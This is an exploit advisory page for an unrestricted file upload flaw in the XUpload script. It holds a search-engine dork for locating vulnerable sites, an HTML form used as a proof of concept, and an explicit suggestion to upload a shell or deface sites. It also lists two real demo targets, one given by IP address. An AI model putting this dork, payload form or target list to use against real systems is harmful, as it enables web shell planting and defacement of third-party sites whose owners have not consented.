XUpload Remote File Upload Vulnerability

2020.11.04

h4shur (IR)

Risk: High

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-434

Dork: intext:"Powered by XUpload"

# Title: XUpload Remote File Upload Vulnerability
# Author: h4shur
# date: 2020-11-04
# Tested on: Windows 10 & Google Chrome
# Category : Web Application Bugs
# Dork : intext:"Powered by XUpload"
### NOTE:
* You can bypass it to upload your shell or deface.
### POC:
* Exploit 1 : site.com/[folder]/[file]
<form enctype="multipart/form-data" action="/cgi-bin/upload.cgi?upload_id=" method="post" onSubmit="return StartUpload(this);" target="xupload">
Send file: <input name="file_1" type="file" onChange="checkExt(this.value)"><br>
Comment: <input type="text" name="comment">(optional)
<br><br>
<Input type="checkbox" name="popup"><label FOR="popup" ACCESSKEY="Z">Show upload status in pop-up window</label><br>
<br>
<input type="submit" value="Upload File">
</form>
### Demo:
* http://www.satyrlp.sorokine.fr
* http://50.116.78.206/uploadtest/upload_form.html
### Contact Me :
* Telegram : @h4shur
* Email : h4shursec@gmail.com
* Instagram : @netedit0r
* twitter : @h4shur

See this note in RAW Version

Vote for this issue:

100%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

XUpload Remote File Upload Vulnerability

Dork: intext:"Powered by XUpload"

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.